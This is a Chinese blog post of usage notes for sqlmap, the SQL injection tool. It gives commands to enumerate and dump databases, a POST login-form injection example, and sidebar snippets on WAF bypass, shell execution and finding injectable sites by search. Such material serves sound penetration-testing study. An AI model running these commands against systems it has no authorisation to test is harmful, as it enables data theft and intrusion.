Sqlmap工具使用心得

最新推荐文章于 2024-06-21 12:52:40 发布
最新推荐文章于 2024-06-21 12:52:40 发布
阅读量995 收藏
点赞数
分类专栏: 【工具】网络安全 文章标签: python 数据库 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47126666/article/details/128751527
版权

常规注入
Post注入
数据包注入

启动

python sqlmap.py -u url

常规注入

python sqlmap.py -u url --dbs      数据库
python sqlmap.py -u url -D DB --tables   数据库表
python sqlmap.py -u url -D DB -T tablename --columns   字段  
python sqlmap.py -u url -D DB -T tablename -C "字段1,字段2……" --dump   爆数据

-u +url 需要注入的链接
–dbs 获取数据库名
–tables
–columns
-D +数据库名
-T + 表名
-C + ”X,X2,X3“列表名

其余指令

  • –batch 让sqlmap自动选择执行过程中出现的询问请求 如果存在注入,就出提示某个参数是可被攻击的
  • –technique
    • B: Boolean-based blind SQL injection(布尔型注入)
    • E: Error-based SQL injection(报错型注入)
    • U: UNION query SQL injection(可联合查询注入)
    • S: Stacked queries SQL injection(可多语句查询注入)
    • T: Time-based blind SQL injection(基于时间延迟注入)
  • –threads 10:延时10s
  • –level 3 :(1-5等级)注入等级,级别越高sqlmap发送的探测payload就越多,越有可能发现注入漏洞
  • –risk 3 : 注入等级

POST注入

python sqlmap.py -u url --data "参数1&参数2&参数3" --batch 

--举个例子
python sqlmap.py -u url --data "uname=admin&passwd=admin&submit=Submit" --dbs --batch
Lucky小小吴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql注入学习心得sqlmap使用心得
ancan8807的博客
04-07 891
做题是最好的老师 首先先来分享一下我用来练手的题目,实验吧中的简单的sql注入1,2,3 不得不说,sql注入真是一个神奇的东西,至少我以前看起来一点头绪都没有的题目能入手了 首先是简单的sql注入3(别问我为什么不是1) 打开链接之后发现 陷入沉思,这时候我决定使用sqlmap对他进行sql注入 在终端输入python2 sqlmap.py -u http://ctf5.s...
SQLMap使用总结
weixin_30865427的博客
07-12 348
支持模式:布尔/时间/报错/联合查询/堆查询 支持数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB 支持系统 Windows/Linux更新 python sqlmap.py --update参数 -...
SQLMAP使用总结
qq_44657899的博客
05-02 1109
正常注入 python sqlmap.py -r .\test.txt --level 3 --batch --dbs 绕过waf sqlmap.py -r .\test.txt --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py 获取可获得信息 sqlmap -r .\test.txt --current-db --current-user --hostname --is-dba
sqlmap 使用总结
weixin_30508309的博客
06-21 338
一直在用sqlmap,一直在浅层的使用方面,所以我想深入了解一下sqlmap。 参考文章: Sqlmap使用教程【个人笔记精华整理】   http://www.vuln.cn/1992 sqlmap用户手册详解【实用版】   http://www.vuln.cn/2035 如何使用SQLMap绕过WAF 作者: 懒人网安  ...
sqlmap使用总结
buffedon的博客
06-11 562
sqlmap使用总结1. 基本用法2. 使用sqlmap探测waf并绕过3. python脚本绕过网站4. 伪造http referer头部探测风险等级5. 执行语句6. 从数据库读文件7. 上传文件到数据库 1. 基本用法 sqlmap -r http.txt #http.txt是我们抓取的http的请求包 sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测 sqlmap -u "
sqlmap工具使用.emmx
07-26
sqlmap工具使用.emmx
sqlmap工具使用.xmind
07-26
sqlmap工具使用.xmind
sqlmap工具
11-26
sqlmap工具测试sql注入非常方便,使用非常简单。sqlmap漏洞测试。
sqlmap工具2020
02-27
sqlmap是一个工具,一个用来做sql注入攻击的工具。这个sqlmap需要python2才可以正常执行,注意python3不行哦。
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
sqlmap使用技巧总结
王骕的专栏
04-03 2491
1.sqlmap的get注入 假设目标是 http://www.baidu.com/news.php?id=1&data=2 sqlmap语句 列库 sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2"--dbs //假设结果显示库有3个: test1 、test2  、test3 获取库test1的表 sqlma
记录并总结一次简单的SQL注入实验——这个看起来有点简单!
Di_iii的博客
03-22 687
http://www.shiyanbar.com/ctf/33 id=%27 报错,是mysql id=1 and 1=1 正常,存在sql注入 id=1 order by 2 查表名 id=1%20union%20select%20null,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc...
sqlmap注入总结
weixin_34321753的博客
08-22 1419
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
SQLmap使用总结
Alexz__的博客
02-15 3519
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
Sqlmap 使用方法小结
热门推荐
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
sql注入学习笔记(4)--sqlmap注入心得
azraelxuemo的博客
07-06 1379
其实也不算心得吧,只是一点小小的体会,抛砖引玉 怎么说呢,还是主要分享一下sql注入的思路,具体的操作还是要看网站了 第一步,注入点 sql注入点最好的寻找方式就是用google,可以经常去google的exploit-db去寻找不错的注入点,这里我也分享一些吧 google查询语句 提取码:yupw 然后手动简单的测试一下,如果觉得像注入点的话就可以移入我们的sqlmap做进一步测试 当然我们也可以查一个网站下面的注入点,就直接在这些语句后面加一点限制比如说site:company.com .
sqlmap
bylfsj的博客
09-23 6590
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在WAF,并且绕过 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码  查看数据库当前用户  判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定...
sqlmap学习笔记(一)
tempulcc的博客
09-23 5839
sqlmap学习笔记(一)sqlmap 常用命令sqlmap 借助google批量扫注入点sqlmap post注入sqlmap cookies注入sqlmap 执行shell命令sqlmap 伪静态注入sqlmap 延迟注入sqlmap 探测waf sqlmap 常用命令 1.sqlmap -u "www.xxx.com/news.asp?id=1" //检查注入点 2.sqlmap -u "www.xxx.com/news.asp?id=1" --current-user //获取当前用户名 3.sq
Windows系统上更换pip源的详细指南
最新发布
2402_85758349的博客
06-21 454
Python的包管理工具pip允许用户从Python包索引(PyPI)下载和安装第三方库。然而,默认的PyPI源有时可能因为网络问题或地理位置导致访问速度较慢。更换为更快的源可以显著提高下载和安装Python包的速度。本文将详细介绍如何在Windows系统上更换pip的源。
kali工具sqlmap使用教程
09-06
你可以使用命令"apt-get install sqlmap"来安装sqlmap工具。 2. 在安装完成后,你可以使用命令"sqlmap -u URL"来指定要测试的目标URL。这个URL应该是一个包含SQL注入漏洞的网站页面。sqlmap将会对该URL进行检测,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值